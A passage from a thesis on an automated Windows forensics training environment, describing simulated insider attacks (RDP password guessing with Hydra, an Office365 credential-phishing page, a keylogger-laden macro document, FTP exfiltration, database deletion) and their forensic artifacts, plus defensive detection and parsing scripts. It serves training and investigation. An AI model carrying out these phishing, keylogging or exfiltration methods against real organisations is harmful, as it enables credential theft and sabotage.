Password guessing attacks on RDP are a very primitive but sometimes very effective type of attack. The attacker tries to gain remote access to the server simply by automatically attempting to log in over and over with different variations of login names and passwords. In our scenario, the attacker (insider) tries to gain remote access to the company's database server.

Reconnaissance

In this stage, the attacker needs to find the IP address of the SQL server. This can be done simply by using one of the many network scanning tools.

Weaponization

The attacker needs to write a script or use a tool that performs the password guessing. Such tools are designed to attempt hundreds of passwords each second. We will use a popular tool for cracking remote authentication services called Hydra1.

1. https://www.thc.org/thc-hydra/


Delivery

Now the attacker is ready to run the tool from their remote server. To automate this attack, the Bash script run-rdp-password-guessing.sh was created. The script has only one input parameter, the IP address of the target server, and performs the following actions:

∙ Install Hydra.

∙ Run the password guessing attack against RDP and the Administrator account. A basic set of passwords is tried.

The script is designed to be executed on the attacker's remote server. In our case, the password guessing attack was unsuccessful and did not reveal any information to the attacker. This is the last stage of the kill chain reached; the attack was prevented by the use of a strong password.

Generated forensics artifacts

∙ Event logs - EventID 4776 (The computer attempted to validate the credentials for an account)
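A way for training participants to find the artifact listed above, added here as an example (it is not part of the thesis tooling): the function reads EventID 4776 from the live Security log or from an exported .evtx and reports workstation/account pairs with many failed validations inside a short window, which is the trace a guessing tool leaves on the targeted server. The field order it relies on (PackageName, TargetUserName, Workstation, Status) is the standard 4776 layout; the threshold, the window size and the evidence file path are assumptions.

```powershell
<#
  Get-CredentialValidationBursts (added example, not part of the thesis tooling).
  Groups failed EventID 4776 validations by source workstation, target account and
  time window and reports the bursts a password guessing run produces.
#>
function Get-CredentialValidationBursts {
    param(
        [string] $EvtxPath,                 # exported Security.evtx; omit to read the live log
        [int]    $Threshold     = 10,       # failures per window that count as a burst (assumed)
        [int]    $WindowMinutes = 5         # window size (assumed)
    )
    $filter = @{ Id = 4776 }
    if ($EvtxPath) { $filter['Path'] = $EvtxPath } else { $filter['LogName'] = 'Security' }

    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

    $failures = foreach ($e in $events) {
        $p = $e.Properties
        if ($p.Count -lt 4) { continue }
        # Status 0x0 is success; 0xC000006A = wrong password, 0xC0000064 = unknown account.
        if ($p[3].Value -eq '0x0') { continue }
        [pscustomobject]@{
            Time        = $e.TimeCreated
            Account     = $p[1].Value
            Workstation = $p[2].Value
            Status      = $p[3].Value
        }
    }

    $windowTicks = [timespan]::FromMinutes($WindowMinutes).Ticks

    $failures |
        Group-Object -Property {
            # Bucket by window so a burst shows up as one group, not one row per attempt.
            $bucket = [math]::Floor($_.Time.Ticks / $windowTicks)
            '{0}|{1}|{2}' -f $_.Workstation, $_.Account, $bucket
        } |
        Where-Object { $_.Count -ge $Threshold } |
        ForEach-Object {
            $ws, $acct, $bucket = $_.Name -split '\|'
            [pscustomobject]@{
                WindowStart = [datetime]::new([long]$bucket * $windowTicks)
                Workstation = $ws
                Account     = $acct
                Failures    = $_.Count
                Statuses    = ($_.Group.Status | Sort-Object -Unique) -join ','
            }
        } |
        Sort-Object Failures -Descending
}

# Example: review a log exported from the SQL server during the investigation (assumed path).
Get-CredentialValidationBursts -EvtxPath 'C:\Case\SQL-Server-Security.evtx' | Format-Table -AutoSize
```

A single account hit by many 0xC000006A results from one workstation in a few minutes is the signature of the guessing attack above; the Statuses column also separates it from a user who merely forgot a password, since guessing runs usually show several distinct failure codes as wrong names and wrong passwords are tried.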

6.2 Phishing email

Phishing is a form of social engineering. This type of attack relies on human weaknesses like gullibility, naivety or ignorance. When people tend to ignore security policies and companies do not invest in security awareness training, these attacks are very effective. They are also very popular among hackers because they allow obtaining the desired information with little effort: attackers do not need to understand technologies in depth or develop sophisticated malware; they just need to make a call or send an email. Phishing uses an email that looks legitimate and leads a user to click on a link or visit a certain website. The link can lead either to malware or to a website that collects the victim's credentials [24]. In our scenario we will use a phishing web page that mimics the Office3652 sign-in screen, looking just like the one the victim is accustomed

2. https://www.office.com/

46 6. Security incidents injection

to seeing when using online versions of Microsoft office tools. Cre- dentials to Office365 are very sensitive information because in most cases they correspond to user’s domain account credentials. Then the attacker could also use those credentials to log into any company website that faces the Internet and get access for example to user’s sensitive files.

Reconnaissance

In this phase, the attacker needs to identify the email address of the recipient. In our organisation, email addresses have the format [email protected]. Since our insider works in the same company as the target person, email addresses are known within the company, and identifying the target employee's address is not a problem.

Weaponization

In this step, we need to set up a malicious website that mimics an original site and steals login credentials. As previously mentioned, we are going to spoof the Office365 login page. The script deploy-phishing-website.sh automates this step: it is a Bash script that installs Apache and then deploys the phishing website. It takes one ZIP archive with the website data as a command-line argument; the archive must contain an index.html file. The script is designed to be executed directly on the attacker's remote server. For the fraudulent Office365 web page I used a template available on GitHub [25]. I made only a slight change to the login-submit.php file, adding functionality that saves the provided credentials on the server (/tmp/credentials.txt) and then redirects the victim to the official Microsoft web page.


Delivery

After the malicious website is set up, we can proceed with sending the phishing email. We use the Google SMTP server to send it; therefore a Gmail account is required. The script send-phishing-email.py uses a function from our Python package and takes five input parameters:

∙ gmail_user - Gmail sender email address.

∙ gmail_password - Gmail sender password.

∙ recipient - Recipient email address.

∙ victim_lastname - Victim’s last name. Personalization will make phishing email more trustworthy.

∙ phishing_link - Link to the phishing website that spoofs the original site and steals login credentials.

Exploitation and Installation

The user receives our email, clicks on the link to the phishing site (Exploitation) and loads it in their browser. The user sees the familiar login page and provides their login name and password (Installation). These user actions are automated with the open-phishing-email.py script. It takes three input parameters:

∙ subject - Subject of the phishing email.

∙ username - User’s Office365 login name.

∙ user_password - User’s Office365 password.

The script uses Outlook keyboard shortcuts for actions like "Go to the Search box" and "Open a received message". It is designed for Outlook 2016 and Outlook 2013 and acts as follows:

1. Open the Outlook application.

2. Search for the email with the provided subject.


3. Open the email and click on the phishing link.

4. Type the login name and password and press Enter.

5. Close all programs (return to the initial state).

Command and Control

Transport of the stolen credentials to the attacker is handled by our phishing website. The credentials can be found on the attacker's server in the /tmp/credentials.txt file.

Actions on Objectives

As the attacker, we have compromised the credentials of a person from senior management and can proceed with lateral movement in the network. We now have access to the network share and can continue with placing malware and stealing confidential data.

Generated forensics artifacts

∙ Records in Exchange logs (retrieving emails).

∙ Users' mailboxes (phishing email with link).

∙ Web browser history.
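Of the three artifacts, browser history is the one that ties the victim's click to the attacker's host, so an added example follows (not one of the thesis scripts). It assumes the victim's browser is Chrome or Chromium, whose History file is an SQLite database with a urls table (url, title, visit_count, last_visit_time) storing timestamps as microseconds since 1601-01-01 UTC; the rows and the attacker host name are constructed, and the database is built in memory so nothing is read from a real profile.

```python
"""Pull visits to a suspected phishing host out of a Chromium-style browser
History database.

Added example for the artifacts listed above; not part of the thesis scripts.
Assumption: the browser is Chrome/Chromium, whose History file is SQLite with
a `urls` table (url, title, visit_count, last_visit_time) where timestamps are
microseconds since 1601-01-01 UTC. The database below is built in memory
from constructed rows, so nothing is read from a real profile.
"""
import sqlite3
from datetime import datetime, timedelta, timezone

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(us):
    """Chromium stores times as microseconds since 1601-01-01 (UTC)."""
    return WEBKIT_EPOCH + timedelta(microseconds=us)


def datetime_to_webkit(dt):
    """Inverse of webkit_to_datetime, used only to build the sample rows."""
    return int((dt - WEBKIT_EPOCH) / timedelta(microseconds=1))


# Constructed sample rows: (url, title, visit_count, last_visit_time).
# attacker.example.net stands in for the phishing server; it is an assumption.
SAMPLE_ROWS = [
    ("https://mail.example.com/owa/", "Outlook Web App", 12,
     datetime(2018, 5, 20, 9, 58, 0, tzinfo=timezone.utc)),
    ("http://attacker.example.net/office365/index.html", "Sign in to your account", 1,
     datetime(2018, 5, 20, 10, 1, 12, tzinfo=timezone.utc)),
    ("https://www.office.com/", "Office", 1,
     datetime(2018, 5, 20, 10, 1, 40, tzinfo=timezone.utc)),
]


def build_sample_history():
    """Create an in-memory History-like database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, title TEXT, "
                 "visit_count INTEGER, last_visit_time INTEGER)")
    conn.executemany(
        "INSERT INTO urls (url, title, visit_count, last_visit_time) VALUES (?, ?, ?, ?)",
        [(u, t, c, datetime_to_webkit(d)) for u, t, c, d in SAMPLE_ROWS])
    conn.commit()
    return conn


def find_visits(conn, host):
    """Return (url, title, visit_count, UTC datetime) for URLs on `host`,
    oldest first, so the analyst can line them up with the phishing email."""
    rows = conn.execute(
        "SELECT url, title, visit_count, last_visit_time FROM urls "
        "WHERE url LIKE ? ORDER BY last_visit_time",
        (f"%://{host}/%",)).fetchall()
    return [(u, t, c, webkit_to_datetime(ts)) for u, t, c, ts in rows]


if __name__ == "__main__":
    conn = build_sample_history()
    for url, title, count, when in find_visits(conn, "attacker.example.net"):
        print(f"{when.isoformat()} {url} ({title}, {count} visits)")
```

On a real image, open a copy of the History file (the browser keeps it locked while running) and pass the suspected host; the redirect to the genuine Microsoft page a few seconds after the phishing visit, as in the sample rows, is exactly the pattern the login-submit.php change above produces.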

6.3 Malware injection

There are many different types of malicious software. In our scenario, we use a malicious Office document, a type of malware attackers commonly use against organizations. Because IT system administrators are not naive computer users and think twice before opening a Word document, our attacker places the file on the corporate network share to make it look legitimate.


Reconnaissance

Because the attacker wants to send a spoofed email from the CEO's account to the IT administrator, they need to find out the recipient's email address in this phase. As already mentioned in the phishing stage, email addresses are known within the company.

Weaponization

In this step, the attacker creates the malicious Office document by hiding a malicious macro inside it. The macro downloads a keylogger from the Apache server (the same one used for the phishing attack) and executes it. The keylogger uploads the intercepted keystrokes to an FTP server. To place the malware on the attacker's server and configure the FTP server, the Bash script deploy-ftp-and-place-malwares.sh has been created. It takes file names as parameters and returns the absolute URL of each file. The script is designed to be executed directly on the attacker's remote server.

Delivery

Now the attacker needs to connect to the network share using the stolen CEO credentials and place the malicious document there. After that, they send a spoofed email pretending to be from the CEO, informing the IT administrator that a new document is available on the file share. Placing the malware on the network share is automated with the place-malware-on-share.py script. It takes four input parameters:

∙ username - The username that will be used to connect to a net- work drive.

∙ password - The password that will be used to connect to a network drive.

∙ file_path - The network path where file should be placed.

∙ malware_path - Absolute URL of the malicious document that will be downloaded and copied to the network drive.


The script is designed to be executed from the attacker’s workstation, located in the domain.

Exploitation and Installation

The victim (the IT administrator) receives the email and goes to the share to open the document. At that moment the macro is executed, and the keylogger is installed and started on the victim's computer. The victim does not notice any malicious activity and continues to perform daily tasks. At some point he uses Remote Desktop Connection to log in to the SQL Server; his credentials are captured and sent to the attacker's remote server. These user actions are automated with the run-malware.py script, which takes three input parameters:

∙ malware_path - The absolute path to the malware on the network drive.

∙ rdp_username - The username that will be used to connect to a remote server.

∙ rdp_password - The password that will be used to connect to a remote server.

The script performs the following tasks:

∙ Open the provided location in file explorer.

∙ Run the Malware.

∙ Wait for some time and use Remote Desktop Client.

∙ Close all programs (return to the initial state).

The script is designed to be executed on the victim's (IT administrator's) computer.

Command and Control

The keylogger runs in the background and sends each keystroke to the attacker's remote server.


Actions on Objectives

Now the attacker can perform further lateral movement in the network. They use the captured credentials to drop the database and disrupt the company's information services.

Generated forensics artifacts

∙ Prefetch files - tracking of program execution (Word, keylogger). On Windows 10 a Prefetch file keeps the last eight execution times of the program.

∙ Processes running in memory (keylogger).

∙ Malicious binaries on the file system.

∙ Active network connections.

6.4 Theft of sensitive information

Now that the attacker has gained access to all required network services, they continue to pursue their aims and can proceed with data theft. The attacker connects to the shared folder and copies the data to their computer. To exfiltrate data, insiders often use file transfer and tunneling protocols such as FTP and SCP (25% of cases according to a McAfee report [3]); we include this fact in our scenario. From their computer, the attacker sends the data over FTP to a server located outside the company network. To automate these actions on the attacker's computer, the script steal-file-from-share.py has been created. It takes the following input parameters:

∙ username - The username that will be used to connect to a net- work drive.

∙ password - The password that will be used to connect to a network drive.

∙ file_path - The network path to file that should be stolen.


The script performs the following tasks:

1. Map Network Drive - connect using stolen credentials.

2. Copy confidential file to the disk.

3. Open the file in the Word application (the attacker checks that the document is the right one).

4. Send file with FTP to an external server.

5. Delete the file from the disk.

6. Close all programs (return to the initial state).

Generated forensics artifacts

∙ LNK files - generated when the attacker opens a document (a non-executable file opened via explorer.exe).

∙ Record in the registry hive file NTUSER.DAT in the user's profile directory (NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs) about the last opened .doc file and when it was opened.

∙ Recycle Bin metadata files - information about the deleted document. On Windows Vista and later this is a $I file in $Recycle.Bin (INFO2 was used by Windows XP); it records the original path, the size and the time of deletion, and proves that the confidential file was present on the attacker's computer.
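Because step 5 of the script deletes the stolen file, the Recycle Bin metadata is the artifact that reconstructs what was taken and when. The following parser is an added example, not one of the thesis scripts. The layout it implements is stated as an assumption from public descriptions of the $I format: an 8-byte version (1 for Vista to 8.1, 2 for Windows 10), an 8-byte original size, an 8-byte FILETIME of deletion, then the original path as UTF-16LE (a fixed 520-byte field in version 1; a 4-byte character count followed by the string in version 2). The sample files are constructed in build_sample_i_file(), so the code runs offline.

```python
"""Parse Windows Recycle Bin $I metadata files.

Added example for the artifacts listed above; not part of the thesis scripts.
Layout (stated here as an assumption from public descriptions of the format):
8-byte version (1 = Vista to 8.1, 2 = Windows 10), 8-byte original size,
8-byte FILETIME of deletion, then the original path as UTF-16LE (a fixed
520-byte field in version 1, a 4-byte character count followed by the string
in version 2). The sample files are constructed in build_sample_i_file().
"""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """Convert a Windows FILETIME (100 ns ticks since 1601) to a UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime, used only to build sample files."""
    return int((dt - FILETIME_EPOCH) / timedelta(microseconds=1)) * 10


def parse_i_file(data):
    """Return a dict with version, original size, deletion time and path."""
    if len(data) < 24:
        raise ValueError("too short to be a $I file")
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        # fixed 260-character (520-byte) null-padded field
        raw = data[24:24 + 520]
        path = raw.decode("utf-16-le").split("\x00", 1)[0]
    elif version == 2:
        # length-prefixed string; the count includes the terminating null
        (nchars,) = struct.unpack_from("<I", data, 24)
        raw = data[28:28 + nchars * 2]
        if len(raw) != nchars * 2:
            raise ValueError("truncated path")
        path = raw.decode("utf-16-le").rstrip("\x00")
    else:
        raise ValueError(f"unknown $I version {version}")
    return {"version": version, "size": size,
            "deleted": filetime_to_datetime(ft), "path": path}


def build_sample_i_file(version, path, size, deleted):
    """Construct a $I file for testing (sample data, not captured from a system)."""
    header = struct.pack("<QQQ", version, size, datetime_to_filetime(deleted))
    encoded = (path + "\x00").encode("utf-16-le")
    if version == 1:
        return header + encoded.ljust(520, b"\x00")
    return header + struct.pack("<I", len(path) + 1) + encoded


# Constructed values standing in for the stolen document (assumptions).
SAMPLE_DELETED = datetime(2018, 5, 20, 14, 30, 0, tzinfo=timezone.utc)
SAMPLE_PATH = r"C:\Users\attacker\Documents\confidential.doc"

if __name__ == "__main__":
    for v in (1, 2):
        rec = parse_i_file(build_sample_i_file(v, SAMPLE_PATH, 45056, SAMPLE_DELETED))
        print(rec)
```

On a real system the $I file sits next to a $R file with the same suffix that holds the content; the $I record survives even after the $R file is purged, which is why it still proves the document's presence.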

6.5 Disruption of company’s information services

Another of the attacker's aims is to drop the Eshop database and disrupt the company's business operations. To perform these actions and generate the related forensic artifacts, the script database-disruption.py has been created. It takes the following input parameters:

∙ username - The username that will be used to connect to SQL server.


∙ password - The password that will be used to connect to SQL server.

∙ server_name - The computer name of the SQL server.

The script performs the following tasks:

1. Open a web browser and search for the command to erase an SQL database.

2. Connect to SQL server and trigger the commands.

3. Close all programs (return to the initial state).

Before running these actions, we trigger the creation of a Volume Shadow Copy on the SQL server. This generates an additional forensic artifact and demonstrates how the data can be restored if the shadow copy is still present on the disk.

7 Conclusion

The aim of this thesis was to design processes and tools to create a simulated environment that will be used for digital forensics trainings. Firstly I did the research to pick three orchestration technologies that support MS Windows. I tested them and chose the one that best suits the requirements of the training. I familiarized myself with this technology and designed the configuration data structure and deployment process. The data in the configuration scripts are clearly structured and logically separated. The created scripts allow the environment to be deployed repeatedly with minimum human interaction, and they are reasonably parametrizable.

Deployment scripts have been created for each basic type of Windows server that can be met in an enterprise IT infrastructure. Testing and debugging these scripts was not easy because the installation of Windows services takes a non-trivial amount of time; as an example, the installation of the SQL Database Server with all required features can take up to 3 hours.

When I had a working environment that could be easily and repeatably deployed, I proceeded with populating it with data to make it look realistic. The process of filling the environment with data is also automated: I created scripts to deploy the web application, fill the database with sample data and add users to the domain. One of the most challenging things was to simulate daily user activity. It is not enough just to do a particular task in the system; the scripts have to simulate real user behaviour to generate true forensic footprints.

During my work on this thesis, I attended various forensics trainings to understand the important forensic areas on Windows systems. Based on this knowledge I designed and implemented attacks in the environment that generate such evidence. The behaviour of the attacker in the systems is also automated.

The environment built with the created scripts can be used for trainings aimed at the basics of Windows forensics. I provided an example of a scenario that could be used during a training in KYPO. On most forensics trainings the participants work with a copy of the original evidence; at the beginning of the exercise, they are provided with all required information. My training is unique because participants are given a live system, and they need to collect the evidence themselves first. This approach teaches them that if they do something wrong they can irreversibly lose their evidence. Such a unique approach and the tools that allow realizing it are the main contribution of this thesis.

It is important to note that I was not able to automate all the installation steps and user activities. In most cases, it was impossible due to limitations of the Windows environment. Therefore the deployment process still needs to be operated by an organizer and some manual work will be required.

In the end, I would like to recall a famous forensic statement: "Every contact leaves a trace." We can try to simulate user behaviour in the system, however there will always be evidence that some additional script was running. This is the reason why an environment prepared in this way is suitable only for on-site training, when the learning process is divided into blocks and the instructor is available for questions.

Bibliography

1. EC-COUNCIL. Computer Forensics: Investigation Procedures and Response (EC-Council Press). Course Technology, 2009. ISBN 978-1-435-48349-1.

2. ČELEDA, Pavel; ČEGAN, Jakub; VYKOPAL, Jan; TOVARŇÁK, Daniel. M and S Support to Operational Tasks Including War Gaming, Logistics, Cyber Defence. KYPO – A Platform for Cyber Defence Exercises [online]. Munich (Germany): NATO Science and Technology Organization, 2015. ISBN 978-92-837-2020-1. Available also from: https://is.muni.cz/repo/1319597/2015-NATO-MSG-133-kypo-platform-cyber-defence-exercises-paper.pdf.

3. Grand Theft Data: Data exfiltration study: Actors, tactics, and detection [online]. McAfee [visited on 2018-05-19]. Available from: https://www.mcafee.com/us/resources/reports/rp-data-exfiltration.pdf.

4. DESMOND, Brian; RICHARDS, Joe. Active Directory. Fifth edition. Sebastopol: O'Reilly Media, 2013. ISBN 978-1-449-32002-7.

5. ELFASSY, David. Mastering Exchange Server 2013. 1st edition. Indianapolis, IN: John Wiley and Sons, 2013. ISBN 978-1-118-55683-2.

6. SCHAEFER, Kenneth; COCHRAN, Jeff; FORSYTH, Scott; GLENDENNING, Dennis; PERKINS, Benjamin. Professional Microsoft IIS 8. Wrox, 2012. ISBN 978-1-118-38804-4.

7. PETKOVIĆ, Dusan. Microsoft SQL Server 2008: A Beginner's Guide. McGraw-Hill Education, 2008. ISBN 978-0-071-54638-6.

8. LUTTGENS, Jason T.; PEPE, Matthew; MANDIA, Kevin. Incident Response & Computer Forensics, Third Edition. McGraw-Hill Education, 2014. ISBN 978-0-071-79868-6.

9. Puppet documentation [online]. Puppet [visited on 2018-05-07]. Available from: https://puppet.com/docs/pe/2018.1/managing_windows_nodes/windows_module_pack.html.

10. Puppet documentation [online]. Puppet [visited on 2018-05-07]. Available from: https://puppet.com/docs/puppet/5.5/architecture.html#the-stand-alone-architecture.


11. MADHURRANJAN, Mohaan; RAITHATHA, Ramesh. Learning Ansible: use Ansible to configure your systems, deploy software, and orchestrate advanced IT tasks. Birmingham, UK: Packt Publishing, 2014. ISBN 978-1-78355-063-0.

12. Ansible Documentation [online]. Ansible [visited on 2018-05-08]. Available from: http://docs.ansible.com/ansible/latest/modules/list_of_windows_modules.html.

13. JONES, Don; JANUSZKO, Melissa. The DSC Book. Leanpub, 2017. Available also from: https://leanpub.com/the-dsc-book.

14. Separating configuration and environment data [online]. Microsoft, 2017 [visited on 2018-05-06]. Available from: https://docs.microsoft.com/en-us/powershell/dsc/separatingenvdata.

15. SQL Server Management Studio (SSMS) [online]. Microsoft [visited on 2018-05-02]. Available from: https://docs.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms?view=sql-server-2017.

16. Getting IDs to use with the Package DSC resource [online]. Microsoft [visited on 2018-05-21]. Available from: https://blogs.msdn.microsoft.com/brian_farnhill/2017/07/04/getting-ids-to-use-with-the-package-dsc-resource/.

17. Exchange 2016 prerequisites [online]. Microsoft Technet [visited on 2018-05-20]. Available from: https://technet.microsoft.com/en-us/library/bb691354(v=exchg.160).aspx.

18. What is UCMA 4.0 [online]. Office Dev Center [visited on 2018-05-20]. Available from: https://msdn.microsoft.com/en-us/library/office/dn465943.aspx.

19. Plan your enterprise deployment of Office 365 ProPlus [online]. Microsoft [visited on 2018-05-20]. Available from: https://docs.microsoft.com/en-us/deployoffice/plan-office-365-proplus.

20. MAZ, Andrei. nopCommerce - release-3.80 [online]. GitHub, 2016 [visited on 2018-05-02]. Available from: https://github.com/nopSolutions/nopCommerce/releases/download/release-3.80/nopCommerce_3.80_NoSource.rar.


21. NopCommerce documentation [online]. NopCommerce [visited on 2018-05-05]. Available from: http://docs.nopcommerce.com/display/en/Installation+guide.

22. Pywinauto Documentation [online]. Pywinauto [visited on 2018-05-21]. Available from: http://pywinauto.readthedocs.io/en/latest/index.html.

23. HUTCHINS, Eric M.; CLOPPERT, Michael J.; AMIN, Rohan M. Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains. Lockheed Martin Corporation, 2011. Available also from: https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf.

24. BLOCKMON, Raymond. CEH V9: Certified Ethical Hacker Version 9 Practice Tests. 1st. Alameda, CA, USA: SYBEX Inc., 2016. ISBN 978-1-119-25215-3.

25. PENTESTGEEK. Phishing Frenzy Templates [online]. GitHub [visited on 2018-05-14]. Available from: https://github.com/pentestgeek/phishing-frenzy-templates/tree/master/office365.


A Attachments

The electronic attachment is compressed in the thesis-archive.zip file, which contains the created scripts for building a training environment aimed at digital forensics with minimum human interaction. The electronic attachment is a snapshot of the main development repository. If you are looking for the newest version, it is available here: https://github.com/ICS-MU/stark-forensics
